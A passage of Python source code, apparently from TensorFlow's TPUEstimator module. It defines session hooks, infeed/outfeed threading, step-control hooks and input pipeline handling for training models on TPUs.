tensorflow.contrib.tpu.python.tpu import util as util_lib from tensorflow.contrib.training.python.training import hparam from tensorflow.core.framework import variable_pb2 from tensorflow.core.framework.summary_pb2 import Summary from tensorflow.core.protobuf import config_pb2 from tensorflow.python.data.ops import dataset_ops from tensorflow.python.estimator import estimator as estimator_lib from tensorflow.python.estimator import model_fn as model_fn_lib from tensorflow.python.estimator import util as estimator_util from tensorflow.python.estimator.export import export_output as export_output_lib from tensorflow.python.framework import constant_op from tensorflow.python.framework import dtypes from tensorflow.python.framework import errors from tensorflow.python.framework import ops from tensorflow.python.ops import array_ops from tensorflow.python.ops import check_ops from tensorflow.python.ops import control_flow_ops from tensorflow.python.ops import init_ops from tensorflow.python.ops import math_ops from tensorflow.python.ops import resource_variable_ops from tensorflow.python.ops import state_ops from tensorflow.python.ops import summary_ops_v2 as contrib_summary from tensorflow.python.ops import variable_scope from tensorflow.python.ops import variables from tensorflow.python.platform import tf_logging as logging from tensorflow.python.saved_model import tag_constants from tensorflow.python.summary import summary from tensorflow.python.training import basic_session_run_hooks from tensorflow.python.training import evaluation from tensorflow.python.training import session_run_hook from tensorflow.python.training import training from tensorflow.python.training import training_util from tensorflow.python.util import function_utils from tensorflow.python.util import nest from tensorflow.python.util import tf_inspect _INITIAL_LOSS = 1e7 _ZERO_LOSS = 0. _TPU_ESTIMATOR = 'tpu_estimator' _ITERATIONS_PER_LOOP_VAR = 'iterations_per_loop' _BATCH_SIZE_KEY = 'batch_size' _CTX_KEY = 'context' _USE_TPU_KEY = 'use_tpu' _CROSS_REPLICA_SUM_OP = 'CrossReplicaSum' _ONE_GIGABYTE = 1024 * 1024 * 1024 _TPU_ENQUEUE_OPS = '_tpu_enqueue_ops' _TPU_TRAIN_OP = '_tpu_train_op' _REWRITE_FOR_INFERENCE_MODE = '_rewrite_for_inference' # Ideally _USE_TPU_KEY should be reserved as well. However there are already # models that make use of this key, thus it can not be reserved now to prevent # breakage. In the long run, we would like to mitigate this by migrating models # off of using _USE_TPU_KEY. _RESERVED_PARAMS_KEYS = [_BATCH_SIZE_KEY, _CTX_KEY] # TODO(b/65703635): Flip the value and remove all dead code. Currently, this is # only used for per-core based deployments. For per-host based pipelines, if a # user returns a Dataset instance it will be automatically wrapped in a # tf.while_loop (This can be disabled by returning features and labels # explicitly). _WRAP_INPUT_FN_INTO_WHILE_LOOP = False ops.register_proto_function( '{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR), proto_type=variable_pb2.VariableDef, to_proto=resource_variable_ops._to_proto_fn, # pylint: disable=protected-access from_proto=resource_variable_ops._from_proto_fn) # pylint: disable=protected-access def _create_global_step(graph): graph = graph or ops.get_default_graph() if training.get_global_step(graph) is not None: raise ValueError('"global_step" already exists.') # Create in proper graph and base name_scope. with graph.as_default() as g, g.name_scope(None): return variable_scope.get_variable( ops.GraphKeys.GLOBAL_STEP, shape=[], dtype=dtypes.int64, initializer=init_ops.zeros_initializer(), trainable=False, use_resource=True, collections=[ops.GraphKeys.GLOBAL_VARIABLES, ops.GraphKeys.GLOBAL_STEP]) def _create_or_get_iterations_per_loop(): """Creates or gets the iterations_per_loop variable. In TPUEstimator, the user provided computation, the model_fn, is wrapped inside a tf.while_loop for peak performance. The iterations of the loop are specified by this variable, which adjusts its value on the CPU after each TPU program execution and before the next TPU execution. The purpose of using a variable, rather then a constant, is to allow TPUEstimator adapt the TPU training iterations according to the final steps specified by users. For example, if the user sets the iterations_per_loop as 4 in TPUConfig and steps as 10 in TPUEstimator.train(), the iterations_per_loop variable will have the following value before each TPU training. - 1-th TPU execution: iterations_per_loop = 4 - 2-th TPU execution: iterations_per_loop = 4 - 3-th TPU execution: iterations_per_loop = 2 As model_fn increases the global step once per train_op invocation, the global step is 10 after all TPU executions, matching the steps=10 inputs passed in by users. Returns: A TF non-trainable resource variable. Raises: RuntimeError: If multi iterations_per_loop variables were found. """ graph = ops.get_default_graph() collection_name = '{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR) iter_vars = graph.get_collection(collection_name) if len(iter_vars) == 1: return iter_vars[0] elif len(iter_vars) > 1: raise RuntimeError('Multiple iterations_per_loop_var in collection.') with ops.colocate_with(training_util.get_global_step()): with variable_scope.variable_scope( _TPU_ESTIMATOR, reuse=variable_scope.AUTO_REUSE): return variable_scope.get_variable( _ITERATIONS_PER_LOOP_VAR, initializer=init_ops.zeros_initializer(), shape=[], dtype=dtypes.int32, trainable=False, collections=[collection_name, ops.GraphKeys.LOCAL_VARIABLES], use_resource=True) def _sync_variables_ops(): # Gets the variables back from TPU nodes. This means the variables updated # by TPU will now be *synced* to host memory. return [ array_ops.check_numerics(v.read_value(), 'Gradient for %s is NaN' % v.name).op for v in variables.trainable_variables() ] def _increase_eval_step_op(iterations_per_loop): """Returns an op to increase the eval step for TPU evaluation. Args: iterations_per_loop: Tensor. The number of eval steps running in TPU system before returning to CPU host for each `Session.run`. Returns: An operation """ eval_step = evaluation._get_or_create_eval_step() # pylint: disable=protected-access # Estimator evaluate increases 1 by default. So, we increase the difference. return state_ops.assign_add( eval_step, math_ops.cast(iterations_per_loop - 1, dtype=eval_step.dtype), use_locking=True) class _SIGNAL(object): """Signal used to control the thread of infeed/outfeed. All preserved signals must be negative numbers. Positive numbers are used to indicate the number of iterations for next training/evaluation loop. """ NEXT_BATCH = -1 STOP = -2 class TPUEstimatorSpec(model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access """Ops and objects returned from a `model_fn` and passed to `TPUEstimator`. See `EstimatorSpec` for `mode`, `predictions`, `loss`, `train_op`, and `export_outputs`. For evaluation, `eval_metrics `is a tuple of `metric_fn` and `tensors`, where `metric_fn` runs on CPU to generate metrics and `tensors` represents the `Tensor`s transferred from TPU system to CPU host and passed to `metric_fn`. To be precise, TPU evaluation expects a slightly different signature from the @{tf.estimator.Estimator}. While `EstimatorSpec.eval_metric_ops` expects a dict, `TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`. The `tensors` could be a list of `Tensor`s or dict of names to `Tensor`s. The `tensors` usually specify the model logits, which are transferred back from TPU system to CPU host. All tensors must have be batch-major, i.e., the batch size is the first dimension. Once all tensors are available at CPU host from all shards, they are concatenated (on CPU) and passed as positional arguments to the `metric_fn` if `tensors` is list or keyword arguments if `tensors` is a dict. `metric_fn` takes the `tensors` and returns a dict from metric string name to the result of calling a metric function, namely a `(metric_tensor, update_op)` tuple. See `TPUEstimator` for MNIST example how to specify the `eval_metrics`. `scaffold_fn` is a function running on CPU to generate the `Scaffold`. This function should not capture any Tensors in `model_fn`. `host_call` is a tuple of a `function` and a list or dictionary of `tensors` to pass to that function and returns a list of Tensors. `host_call` currently works for train() and evaluate(). The Tensors returned by the function is executed on the CPU on every step, so there is communication overhead when sending tensors from TPU to CPU. To reduce the overhead, try reducing the size of the tensors. The `tensors` are concatenated along their major (batch) dimension, and so must be >= rank 1. The `host_call` is useful for writing summaries with @{tf.contrib.summary.create_file_writer}. """ def __new__(cls, mode, predictions=None, loss=None, train_op=None, eval_metrics=None, export_outputs=None, scaffold_fn=None, host_call=None): """Creates a validated `TPUEstimatorSpec` instance.""" host_calls = {} if eval_metrics is not None: host_calls['eval_metrics'] = eval_metrics if host_call is not None: host_calls['host_call'] = host_call _OutfeedHostCall.validate(host_calls) return super(TPUEstimatorSpec, cls).__new__( cls, mode=mode, predictions=predictions, loss=loss, train_op=train_op, eval_metrics=eval_metrics, export_outputs=export_outputs, scaffold_fn=scaffold_fn, host_call=host_call) def as_estimator_spec(self): """Creates an equivalent `EstimatorSpec` used by CPU train/eval.""" host_calls = {} if self.eval_metrics is not None: host_calls['eval_metrics'] = self.eval_metrics if self.host_call is not None: host_calls['host_call'] = self.host_call host_call_ret = _OutfeedHostCall.create_cpu_hostcall(host_calls) eval_metric_ops = None if self.eval_metrics is not None: eval_metric_ops = host_call_ret['eval_metrics'] hooks = None if self.host_call is not None: hooks = [_OutfeedHostCallHook(host_call_ret['host_call'])] scaffold = self.scaffold_fn() if self.scaffold_fn else None return model_fn_lib.EstimatorSpec( mode=self.mode, predictions=self.predictions, loss=self.loss, train_op=self.train_op, eval_metric_ops=eval_metric_ops, export_outputs=self.export_outputs, scaffold=scaffold, training_hooks=hooks, evaluation_hooks=hooks, prediction_hooks=hooks) class _OpQueueContext(object): """Manages work queue and thread for a infeed/outfeed thread.""" def __init__(self, name, target, args): self._name = name self._queue = Queue.Queue() args = (self,) + args self._thread = threading.Thread(name=name, target=target, args=args) self._thread.daemon = True self._thread.start() def stop(self): self._queue.put(_SIGNAL.STOP) def send_next_batch_signal(self, iterations): self._queue.put(iterations) def read_iteration_counts(self): while True: iterations = self._queue.get(block=True) logging.debug('%s read iterations %s', self._name, iterations) if iterations == _SIGNAL.STOP: logging.info('%s received shutdown signal, stopping.', self._name) return yield iterations def join(self): logging.info('Shutting down %s thread.' % self._name) self.stop() self._thread.join() class _OpSignalOnceQueueContext(_OpQueueContext): """Manages work queue and thread for a infeed/outfeed thread. This subclass only signals once. """ def __init__(self, name, target, args): super(_OpSignalOnceQueueContext, self).__init__(name, target, args) self._has_signaled = False def send_next_batch_signal(self, iterations): if not self._has_signaled: self._queue.put(iterations) self._has_signaled = True class TPUInfeedOutfeedSessionHook(session_run_hook.SessionRunHook): """A Session hook setting up the TPU initialization, infeed, and outfeed. This hook does two major things: 1. initialize and shutdown TPU system. 2. launch and join the threads for infeed enqueue and (optional) outfeed dequeue. """ def __init__(self, ctx, enqueue_ops, dequeue_ops, run_infeed_loop_on_coordinator=True): self._master_job = ctx.master_job self._enqueue_ops = enqueue_ops self._dequeue_ops = dequeue_ops self._run_infeed_loop_on_coordinator = run_infeed_loop_on_coordinator self._initial_infeed_sleep_secs = ( ctx.config.tpu_config.initial_infeed_sleep_secs) self._session_cancel_timer = None self._feed_error = None self._finished = False def begin(self): logging.info('TPU job name %s', self._master_job) self._iterations_per_loop_var = _create_or_get_iterations_per_loop() self._init_ops = [tpu.initialize_system(job=self._master_job)] self._finalize_ops = [tpu.shutdown_system(job=self._master_job)] summary_writer_init_ops = contrib_summary.summary_writer_initializer_op() self._init_ops.extend(summary_writer_init_ops) # Get all the writer resources from the initializer, so we know what to # flush. for op in summary_writer_init_ops: self._finalize_ops.append(contrib_summary.flush(writer=op.inputs[0])) def _log_error(self, session, error): """Log an infeed or outfeed error. This logs a short error message immediately, and schedules a timer to emit the full stack trace and error message after a short period of time. If the main session has terminated by the time the timer triggers, we assume the real source of the error was from the main session and avoid emitting a stack trace for the infeed. Args: session: `tf.Session`, session to be terminated error: exception that triggered logging. error: the Exception to log. """ logging.warning( '\n\n' 'Error occurred during infeed/outfeed. This may be due to a compile ' 'error in the main session. Waiting for a short time for the main ' 'session to come back.\n\n%s', error) self._feed_error = traceback.format_exc() # If we've already encountered a feed error, don't schedule another # cancellation op. if self._session_cancel_timer: return def _cancel_session(): """Close the session to avoid the main thread from hanging. If input pipeline triggers any error, the infeed thread dies but the main thread for TPU computation waits for the infeed enqueue forever. Close the Session to cancel the main thread Session.run execution. We sleep for a few seconds before closing to give some time for the TPU compilation error, if any, propagating, from TPU to CPU host. Compilation errors should be reported by the main thread so that the program can be interrupted and users can take action. Due to a race condition, the infeed thread might see an error first. Closing the session here immediately would result in a session cancellation exception in the main thread, instead of the expected compile error. User code that depends on having the proper exception type will therefore be confused. """ time.sleep(5) # If the main session is still running, the infeed/outfeed errors are # legitimate, and should be logged. if not self._finished and self._feed_error: logging.error('Feed error: %s', self._feed_error) logging.error('Closing session. A RuntimeError should follow.') session.close() self._session_cancel_timer = threading.Thread(target=_cancel_session) self._session_cancel_timer.daemon = True self._session_cancel_timer.start() def _run_infeed(self, queue_ctx, session): logging.info('Starting infeed thread controller.') if self._initial_infeed_sleep_secs: logging.info('%s thread sleeping for %d seconds.', self._name, self._initial_infeed_sleep_secs) time.sleep(self._initial_infeed_sleep_secs) logging.info('%s thread starting after sleep', self._name) try: if self._run_infeed_loop_on_coordinator: for count, steps in enumerate(queue_ctx.read_iteration_counts()): for i in xrange(steps): logging.debug('Infeed enqueue for iteration (%d, %d)', count, i) session.run(self._enqueue_ops) else: for _ in queue_ctx.read_iteration_counts(): session.run(self._enqueue_ops) logging.info('Infeed thread finished, shutting down.') except Exception as e: # pylint: disable=broad-except self._log_error(session, e) def _run_outfeed(self, queue_ctx, session): logging.info('Starting outfeed thread controller.') try: for count, steps in enumerate(queue_ctx.read_iteration_counts()): for i in xrange(steps): logging.debug('Outfeed dequeue for iteration (%d, %d)', count, i) session.run(self._dequeue_ops) logging.info('Outfeed thread finished, shutting down.') except Exception as e: # pylint: disable=broad-except self._log_error(session, e) def _create_infeed_controller(self, name, target, args): return _OpQueueContext(name=name, target=target, args=args) def after_create_session(self, session, coord): logging.info('Init TPU system') session.run(self._init_ops, options=config_pb2.RunOptions(timeout_in_ms=5 * 60 * 1000)) self._infeed_controller = self._create_infeed_controller( name='InfeedController', target=self._run_infeed, args=(session,)) self._outfeed_controller = _OpQueueContext( name='OutfeedController', target=self._run_outfeed, args=(session,)) def before_run(self, run_context): self._feed_error = None # Wait for the cancellation timer to complete before continuing. if self._session_cancel_timer: self._session_cancel_timer.join() self._session_cancel_timer = None iterations = run_context.session.run(self._iterations_per_loop_var) logging.info('Enqueue next (%d) batch(es) of data to infeed.', iterations) self._infeed_controller.send_next_batch_signal(iterations) logging.info('Dequeue next (%d) batch(es) of data from outfeed.', iterations) self._outfeed_controller.send_next_batch_signal(iterations) def end(self, session): if self._session_cancel_timer: logging.warning('Feed error occurred; waiting for message.') self._session_cancel_timer.join() self._finished = True logging.info('Stop infeed thread controller') self._infeed_controller.join() logging.info('Stop output thread controller') self._outfeed_controller.join() logging.info('Shutdown TPU system.') session.run(self._finalize_ops) class TPUInfeedOutfeedSessionHookForPrediction(TPUInfeedOutfeedSessionHook): def __init__(self, ctx, enqueue_ops, dequeue_ops): super(TPUInfeedOutfeedSessionHookForPrediction, self).__init__( ctx, enqueue_ops, dequeue_ops, run_infeed_loop_on_coordinator=False) def _create_infeed_controller(self, name, target, args): return _OpSignalOnceQueueContext(name=name, target=target, args=args) class _TPUStopAtStepHook(session_run_hook.SessionRunHook): """Hook that requests stop at a specified step. This hook is similar to the `session_run_hook._StopAfterNEvalsHook` with following differences for TPU training: 1. This hook sets the variable for iterations_per_loop, which is used by `TPUInfeedOutfeedSessionHook` to control the iterations for infeed/outfeed. As the hook execution order is not guaranteed, the variable update is handled in `after_create_session` and `after_run` as `TPUInfeedOutfeedSessionHook` reads the variable value in `before_run`. 2. For each training loop (session.run), the global step could be increased multiple times on TPU. The global step tensor value will be explicitly read again in `after_run` to ensure the latest value is retrieved to avoid race condition. """ def __init__(self, iterations, num_steps=None, last_step=None): """Initializes a `StopAtStepHook`. Args: iterations: The number of iterations to run optimizer per training loop. num_steps: Number of steps to execute. last_step: Step after which to stop. Raises: ValueError: If one of the arguments is invalid. """ if num_steps is None and last_step is None: raise ValueError('One of num_steps or last_step must be specified.') if num_steps is not None and last_step is not None: raise ValueError('Only one of num_steps or last_step can be specified.') self._num_steps = num_steps self._last_step = last_step self._iterations = iterations def _next_iterations(self, global_step, last_step): gap = last_step - global_step return min(gap, self._iterations) def begin(self): self._global_step_tensor = training_util.get_global_step() if self._global_step_tensor is None: raise RuntimeError('Global step should be created.') self._iterations_per_loop_var = _create_or_get_iterations_per_loop() def after_create_session(self, session, coord): global_step = session.run(self._global_step_tensor) if self._last_step is None: self._last_step = global_step + self._num_steps iterations = self._next_iterations(global_step, self._last_step) self._iterations_per_loop_var.load(iterations, session=session) def after_run(self, run_context, run_values): # Global step cannot be retrieved via SessionRunArgs and before_run due to # race condition. global_step = run_context.session.run(self._global_step_tensor) if global_step >= self._last_step: run_context.request_stop() else: iterations = self._next_iterations(global_step, self._last_step) self._iterations_per_loop_var.load( iterations, session=run_context.session) class _SetEvalIterationsHook(session_run_hook.SessionRunHook): """Hook that requests stop at a specified step.""" def __init__(self, num_steps): """Initializes a `_SetEvalIterationsHook`. Args: num_steps: Number of steps to execute. """ self._num_steps = num_steps def begin(self): self._iterations_per_loop_var = _create_or_get_iterations_per_loop() def after_create_session(self, session, coord): self._iterations_per_loop_var.load(self._num_steps, session=session) class _StoppingPredictHook(session_run_hook.SessionRunHook): """Hook that requests stop according to the stopping signal in prediction.""" def __init__(self, scalar_stopping_signal): self._scalar_stopping_signal = scalar_stopping_signal def begin(self): self._iterations_per_loop_var = _create_or_get_iterations_per_loop() def after_create_session(self, session, coord): # This is not necessary as we do not run infeed enqueue and outfeed dequeue # in side threads for prediction model. But it makes the # TPUInfeedOutfeedSessionHook prints nice message. self._iterations_per_loop_var.load(1, session=session) def before_run(self, run_context): return session_run_hook.SessionRunArgs(self._scalar_stopping_signal) def after_run(self, run_context, run_values): _ = run_context scalar_stopping_signal = run_values.results if _StopSignals.should_stop(scalar_stopping_signal): # NOTE(xiejw): In prediction, stopping signals are inserted for each # batch. And we append one more batch to signal the system it should stop. # The data flow might look like # # batch 0: images, labels, stop = 0 (user provided) # batch 1: images, labels, stop = 0 (user provided) # ... # batch 99: images, labels, stop = 0 (user provided) # batch 100: images, labels, stop = 1 (TPUEstimator appended) # # where the final batch (id = 100) is appended by TPUEstimator, so we # should drop it before returning the predictions to user. # To achieve that, we throw the OutOfRangeError in after_run. Once # Monitored Session sees this error in SessionRunHook.after_run, the # "current" prediction, i.e., batch with id=100, will be discarded # immediately raise errors.OutOfRangeError(None, None, 'Stopped by stopping signal.') def generate_per_core_enqueue_ops_fn_for_host( ctx, input_fn, inputs_structure_recorder, host_device, host_id): """Generates infeed enqueue ops for per-core input_fn on a single host.""" captured_infeed_queue = _CapturedObject() tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id) def enqueue_ops_fn(): """A fn returns enqueue_ops.""" num_cores_per_host = ctx.num_of_cores_per_host per_host_sharded_inputs = [] for core_ordinal in range(num_cores_per_host): with ops.name_scope('ordinal_%d' % (core_ordinal)): user_context = tpu_context.TPUContext( internal_ctx=ctx, input_device=host_device, invocation_index=host_id * ctx.num_of_cores_per_host + core_ordinal ) inputs = _Inputs.from_input_fn(input_fn(user_context)) if inputs.is_dataset: raise TypeError( '`input_fn` returning `Dataset` is not yet supported in ' 'per-Core input pipeline deployment yet. Please set ' 'TPUConfig.per_host_input_for_training to True or return ' '`features` and `labels` from `input_fn`') features, labels = inputs.features_and_labels() inputs_structure_recorder.validate_and_record_structure( features, labels) flattened_inputs = ( inputs_structure_recorder.flatten_features_and_labels( features, labels)) per_host_sharded_inputs.append(flattened_inputs) infeed_queue = tpu_feed.InfeedQueue( number_of_tuple_elements=len(per_host_sharded_inputs[0])) captured_infeed_queue.capture(infeed_queue) infeed_queue.set_configuration_from_sharded_input_tensors( per_host_sharded_inputs) per_host_enqueue_ops = infeed_queue.generate_enqueue_ops( per_host_sharded_inputs, tpu_ordinal_function=tpu_ordinal_function_impl) return per_host_enqueue_ops return enqueue_ops_fn, captured_infeed_queue def generate_per_host_enqueue_ops_fn_for_host( ctx, input_fn, inputs_structure_recorder, batch_axis, device, host_id): """Generates infeed enqueue ops for per-host input_fn on a single host.""" captured_infeed_queue = _CapturedObject() hooks = [] with ops.device(device): user_context = tpu_context.TPUContext( internal_ctx=ctx, input_device=device, invocation_index=host_id) inputs = _Inputs.from_input_fn(input_fn(user_context)) is_dataset = inputs.is_dataset if ctx.mode == model_fn_lib.ModeKeys.PREDICT: if not is_dataset: raise TypeError( 'For mode PREDICT, `input_fn` must return `Dataset` instead of ' '`features` and `labels`.') if batch_axis is not None: raise TypeError('For mode PREDICT, batch_axis is not supported yet.') inputs = _InputsWithStoppingSignals( dataset=inputs.dataset, batch_size=ctx.batch_size_for_input_fn, add_padding=True) if is_dataset: hooks.append(inputs.dataset_initializer_hook()) tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id) def enqueue_ops_fn(): """A Fn returning the TPU infeed enqueue ops. By providing as a Fn, it can be invoked inside the tf.while_loop such that the input pipeline for multiple iterations can be executed by one Session.run call. Returns: list of dict of ops. """ with ops.device(device): num_of_replicas_per_host = ctx.num_of_replicas_per_host # Convert user input to features and labels. If the user returns a # dataset, it is initialized and the features and labels extracted via # `dataset.iterator.get_next()` features, labels = inputs.features_and_labels() signals = inputs.signals() inputs_structure_recorder.validate_and_record_structure( features, labels, signals) unsharded_tensor_list = ( inputs_structure_recorder.flatten_features_and_labels( features, labels, signals)) infeed_queue = tpu_feed.InfeedQueue( tuple_types=[t.dtype for t in unsharded_tensor_list], tuple_shapes=[t.shape for t in unsharded_tensor_list], shard_dimensions=batch_axis) captured_infeed_queue.capture(infeed_queue) infeed_queue.set_number_of_shards(num_of_replicas_per_host) per_host_enqueue_ops = ( infeed_queue.split_inputs_and_generate_enqueue_ops( unsharded_tensor_list, placement_function=lambda x: device, tpu_ordinal_function=tpu_ordinal_function_impl)) if signals is None: return per_host_enqueue_ops else: return { 'ops': per_host_enqueue_ops, 'signals': signals, } return enqueue_ops_fn, captured_infeed_queue, hooks, is_dataset def generate_per_host_v2_enqueue_ops_fn_for_host( ctx, input_fn, inputs_structure_recorder, device, host_id): """Generates infeed enqueue ops for per-host input_fn on a single host.""" captured_infeed_queue = _CapturedObject() hooks = [] with ops.device(device): user_context = tpu_context.TPUContext( internal_ctx=ctx, input_device=device, invocation_index=host_id) inputs = _Inputs.from_input_fn(input_fn(user_context)) is_dataset = inputs.is_dataset if not is_dataset: raise TypeError('`input_fn` must return a `Dataset` for the PER_HOST_V2 ' 'input pipeline configuration.') if ctx.mode == model_fn_lib.ModeKeys.PREDICT: # TODO(b/XXX): Add predict support for PER_HOST_V2 raise TypeError('Most PREDICT not yet supported in PER_HOST_V2 mode.') hooks.append(inputs.dataset_initializer_hook()) tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id) def enqueue_ops_fn(): """Generates the per_host enqueue ops.""" control_deps = [] per_host_sharded_inputs = [] num_replicas_per_host = ctx.num_of_replicas_per_host with ops.device(device): if not inputs.is_dataset: raise TypeError('`input_fn` must return a `Dataset` for this mode.') for _ in range(num_replicas_per_host): # Use control dependencies to ensure a deterministic ordering. with ops.control_dependencies(control_deps): features, labels = inputs.features_and_labels() # Calls get_next() inputs_structure_recorder.validate_and_record_structure( features, labels) flattened_inputs = ( inputs_structure_recorder.flatten_features_and_labels( features, labels)) control_deps.extend(flattened_inputs) per_host_sharded_inputs.append(flattened_inputs) infeed_queue = tpu_feed.InfeedQueue( number_of_tuple_elements=len(per_host_sharded_inputs[0])) captured_infeed_queue.capture(infeed_queue) infeed_queue.set_configuration_from_sharded_input_tensors( per_host_sharded_inputs) per_host_enqueue_ops = infeed_queue.generate_enqueue_ops( per_host_sharded_inputs, tpu_ordinal_function=tpu_ordinal_function_impl) return per_host_enqueue_ops return enqueue_ops_fn, captured_infeed_queue, hooks, is_dataset class _InputPipeline(object): """`_InputPipeline` handles invoking `input_fn` and piping to infeed queue. `_InputPipeline` abstracts the per-core/per-host `input_fn` invocation from call site. To be precise, based on the configuration in `_InternalTPUContext`, it invokes `input_fn` for all cores (usually multi-host TPU training) or for one host (usually for single-host TPU evaluation), and sends all `features` and `labels` returned by `input_fn` to TPU infeed. For per-core invocation, `features` and `labels` are piped to infeed directly, one tuple for each core. For per-host invocation, `features` and `labels` are split at host (with respect to `batch_axis`) and piped to all cores accordingly. In addition, flatten/unflatten are handled by `_InputPipeline` also. Model inputs returned by the `input_fn` can have one of the following forms: 1. features 2. (features, labels) Internally, form 1 is reformed to `(features, None)` as features and labels are passed separately to underlying methods. For TPU training, TPUEstimator may expect multiple `features` and `labels` tuples one for each core. TPUEstimator allows various different structures for inputs (namely `features` and `labels`). `features` can be `Tensor` or dict of string name to `Tensor`, and `labels` could be `None`, `Tensor`, or dict of string name to `Tensor`. TPU infeed/outfeed library expects flattened tensor list. So, `features` and `labels` need to be flattened, before infeed enqueue, and the structure of them needs to be recorded, in order to restore them after infeed dequeue. """ class InputsStructureRecorder(object): """The recorder to record inputs structure.""" def __init__(self): # Holds the structure of inputs self._feature_names = [] self._label_names = [] self._has_labels = False self._signals_helper = None # Internal state. self._initialized = False def has_labels(self): return self._has_labels def validate_and_record_structure(self, features, labels, signals=None): """Validates and records the structure of features` and `labels`.""" def _extract_key_names(tensor_or_dict): if tensor_or_dict is None: return [] return sorted(tensor_or_dict.keys()) if isinstance( tensor_or_dict, dict) else [] # Extract structure. has_labels = labels is not None feature_names = _extract_key_names(features) label_names = _extract_key_names(labels) if signals is not None and self._signals_helper is None: # Record signals helper. self._signals_helper = _SignalsHelper(signals) if self._initialized: # Verify the structure is same. The following should never happen. assert feature_names == self._feature_names, 'feature keys mismatched' assert label_names == self._label_names, 'label keys mismatched' assert has_labels == self._has_labels, 'label presence mismatched' else: # Record structure. self._initialized = True self._feature_names = feature_names self._label_names = label_names self._has_labels = has_labels def flatten_features_and_labels(self, features, labels, signals=None): """Flattens the `features` and `labels` to a single tensor list.""" flattened_inputs = [] if self._feature_names: # We need a fixed ordering for enqueueing and dequeueing. flattened_inputs.extend( [features[name] for name in self._feature_names]) else: flattened_inputs.append(features) if labels is not None: if self._label_names: # We need a fixed ordering for enqueueing and dequeueing. flattened_inputs.extend([labels[name] for name in self._label_names]) else: flattened_inputs.append(labels) if signals is not None: flattened_inputs.extend(_SignalsHelper.as_tensor_list(signals)) return flattened_inputs def unflatten_features_and_labels(self, flattened_inputs): """Restores the flattened inputs to original features and labels form. Args: flattened_inputs: Flattened inputs for each shard. Returns: A tuple of (`features`, `labels`), where `labels` could be None. Each one, if present, should have identical structure (single tensor vs dict) as the one returned by input_fn. Raises: ValueError: If the number of expected tensors from `flattened_inputs` mismatches the recorded structure. """ expected_num_features = ( len(self._feature_names) if self._feature_names else 1) if self._has_labels: expected_num_labels = ( len(self._label_names) if self._label_names else 1) else: expected_num_labels = 0 expected_num_signals = ( self._signals_helper.num_signals if self._signals_helper else 0) expected_num_tensors = ( expected_num_features + expected_num_labels + expected_num_signals) if expected_num_tensors != len(flattened_inputs): raise ValueError( 'The number of flattened tensors mismatches expected num. ' 'Expected {}, got {}'.format(expected_num_tensors, len(flattened_inputs))) if self._feature_names: unflattened_features = dict( zip(self._feature_names, flattened_inputs[:expected_num_features])) else: # Single tensor case unflattened_features = flattened_inputs[0] if expected_num_labels == 0: unflattened_label = None elif self._label_names: label_list = flattened_inputs[ expected_num_features:expected_num_features + expected_num_labels] unflattened_label = dict(zip(self._label_names, label_list)) else: # Single tensor case. unflattened_label = flattened_inputs[expected_num_features] signals = None if expected_num_signals != 0: tensor_list_for_signals = flattened_inputs[ expected_num_features + expected_num_labels:] signals = self._signals_helper.unflatten(tensor_list_for_signals) return _Inputs(unflattened_features, unflattened_label, signals=signals) def __init__(self, input_fn, batch_axis, ctx): """Constructor. Args: input_fn: input fn for train or eval. batch_axis: A python tuple of int values describing how each tensor produced by the Estimator `input_fn` should be split across the TPU compute shards. ctx: A `_InternalTPUContext` instance with mode. Raises: ValueError: If both `sharded_features` and `num_cores` are `None`. """ self._inputs_structure_recorder = _InputPipeline.InputsStructureRecorder() self._sharded_per_core = ctx.is_input_sharded_per_core() self._input_fn = input_fn self._infeed_queue = None self._ctx = ctx self._batch_axis = batch_axis def generate_infeed_enqueue_ops_and_dequeue_fn(self): """Generates infeed enqueue ops and dequeue_fn.""" # While tf.while_loop is called, the body function, which invokes # `enqueue_fn` passed in, is called to construct the graph. So, input_fn # structure is recorded. enqueue_ops, all_hooks, run_infeed_loop_on_coordinator = ( self._invoke_input_fn_and_record_structure()) self._validate_input_pipeline() def dequeue_fn(): """dequeue_fn is used by TPU to retrieve the tensors.""" # In the model-parallel case, both the host-side and device-side # computations must agree on the core on which infeed takes place. We # choose to perform infeed on logical core 0 of each replica. values = self._infeed_queue.generate_dequeue_op(tpu_device=0) # The unflatten process uses the structure information recorded above. return self._inputs_structure_recorder.unflatten_features_and_labels( values) return (enqueue_ops, dequeue_fn, all_hooks, run_infeed_loop_on_coordinator) def _invoke_input_fn_and_record_structure(self): """Deploys the input pipeline and record input structure.""" enqueue_ops = [] infeed_queues = [] all_hooks = [] num_hosts = self._ctx.num_hosts tpu_host_placement_fn = self._ctx.tpu_host_placement_function run_infeed_loop_on_coordinator = True if self._sharded_per_core: # Per-Core input pipeline deployment. # Invoke input pipeline for each core and placed on the corresponding # host. for host_id in range(num_hosts): host_device = tpu_host_placement_fn(host_id=host_id) with ops.device(host_device): with ops.name_scope('input_pipeline_task%d' % (host_id)): enqueue_ops_fn, captured_infeed_queue = ( generate_per_core_enqueue_ops_fn_for_host( self._ctx, self._input_fn, self._inputs_structure_recorder, host_device, host_id)) if _WRAP_INPUT_FN_INTO_WHILE_LOOP: run_infeed_loop_on_coordinator = False enqueue_ops.append( _wrap_computation_in_while_loop( device=host_device, op_fn=enqueue_ops_fn)) else: enqueue_ops.append(enqueue_ops_fn()) # Infeed_queue_getter must be called after enqueue_ops_fn is called. infeed_queues.append(captured_infeed_queue.get()) else: for host_id in range(num_hosts): host_device = tpu_host_placement_fn(host_id=host_id) with ops.device(host_device): with ops.name_scope('input_pipeline_task%d' % (host_id)): if self._ctx.is_input_per_host_with_iterators(): enqueue_ops_fn, captured_infeed_queue, hooks, is_dataset = ( generate_per_host_v2_enqueue_ops_fn_for_host( self._ctx, self._input_fn, self._inputs_structure_recorder, host_device, host_id)) else: enqueue_ops_fn, captured_infeed_queue, hooks, is_dataset = ( generate_per_host_enqueue_ops_fn_for_host( self._ctx, self._input_fn, self._inputs_structure_recorder, self._batch_axis, host_device, host_id)) all_hooks.extend(hooks) # NOTE(xiejw): We dispatch here based on the return type of the # users `input_fn`. # # 1. If input_fn returns a Dataset instance, we initialize the # 